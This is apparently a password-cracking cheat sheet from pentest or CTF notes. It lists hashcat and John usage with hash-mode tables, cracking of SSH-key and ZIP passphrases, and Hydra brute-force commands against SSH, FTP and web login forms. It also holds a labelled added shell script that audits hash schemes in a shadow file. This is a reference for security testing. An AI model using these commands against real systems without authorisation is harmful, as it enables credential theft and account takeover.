Password cracking

Hash-identifier

Run hash-identifier and paste the hash at the prompt.

Unshadow

unshadow passwd.txt shadow.txt > unshadow.txt

Hashcat

Usage

hashcat --help | grep <type_of_hash>
hashcat -m <hash_mode> <hash_file> <wordlist> --force # use CPU in a Kali VM
hashcat64.exe -m <hash_mode> <hash_file> <wordlist> -O # on Windows, use GPU

/etc/shadow file

 500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)        | Operating Systems
3200 | bcrypt $2*$, Blowfish (Unix)                     | Operating Systems
7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems
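
Added example, not part of the original page: the `$id$` prefixes from the table above, read straight from a shadow-format file so an audit can list which scheme each account uses and which fields hold no usable hash. The function names and the sample lines are assumptions made for this example.

```shell
#!/bin/sh
# Added example: report which crypt scheme each account in a shadow-format
# file uses, with the hashcat mode number from the table above.

# classify_hash FIELD -> prints "scheme hashcat_mode state"
classify_hash() {
    h=$1
    state=active
    case "$h" in
        '')   echo "none - empty"; return 0 ;;  # no password set at all
        '!'*) state=locked                      # passwd -l prefixes "!"
              h=${h#\!}; h=${h#\!} ;;
    esac
    case "$h" in
        '$1$'*)    echo "md5crypt 500 $state" ;;
        '$2'?'$'*) echo "bcrypt 3200 $state" ;;
        '$5$'*)    echo "sha256crypt 7400 $state" ;;
        '$6$'*)    echo "sha512crypt 1800 $state" ;;
        ''|'*')    echo "none - locked" ;;      # no usable hash stored
        *)         echo "unknown - $state" ;;   # scheme not in the table
    esac
}

# audit_shadow: read "user:hash:..." lines on stdin (raw /etc/shadow or
# unshadow output) and print one "user scheme mode state" line per account.
audit_shadow() {
    while IFS=: read -r user pwfield _rest; do
        case "$user" in ''|'#'*) continue ;; esac
        printf '%s %s\n' "$user" "$(classify_hash "$pwfield")"
    done
}

# Constructed sample input; salts and digests are placeholders, not real hashes.
sample_shadow() {
    cat <<'EOF'
root:$6$SALTSALT$PLACEHOLDERDIGEST:19000:0:99999:7:::
legacy:$1$SALTSALT$PLACEHOLDERDIGEST:15000:0:99999:7:::
svc:!$5$SALTSALT$PLACEHOLDERDIGEST:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
guest::19000:0:99999:7:::
web:$2y$10$PLACEHOLDERSALTANDDIGEST:19000:0:99999:7:::
EOF
}

sample_shadow | audit_shadow
```

On a real host, feed it the file directly: audit_shadow < /etc/shadow (root required).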

SAM file

3000 | LM                                               | Operating Systems
1000 | NTLM                                             | Operating Systems

John

Usage

john -wordlist=/usr/share/wordlists/rockyou.txt -format=raw-sha1 hashfile.txt
john --show hashfile.txt

Crack RSA key (passphrase of an SSH private key)

locate ssh2john.py
python /usr/share/john/ssh2john.py sshkey.pem > sshkey.pem.hash
john sshkey.pem.hash -wordlist=<wordlist>

ZIP

fcrackzip -u -D -p '<wordlist.txt>' <ch5.zip>

zip2john ch5.zip > ch5.zip.john
john ch5.zip.john

Brute force

Hydra

hydra -l bob -P rockyou.txt http-get://<ip>/protected
hydra -l user -P passlist.txt ftp://<ip>
hydra -l user -P passlist.txt ssh://<ip>
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.100.206 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Last updated 4 years ago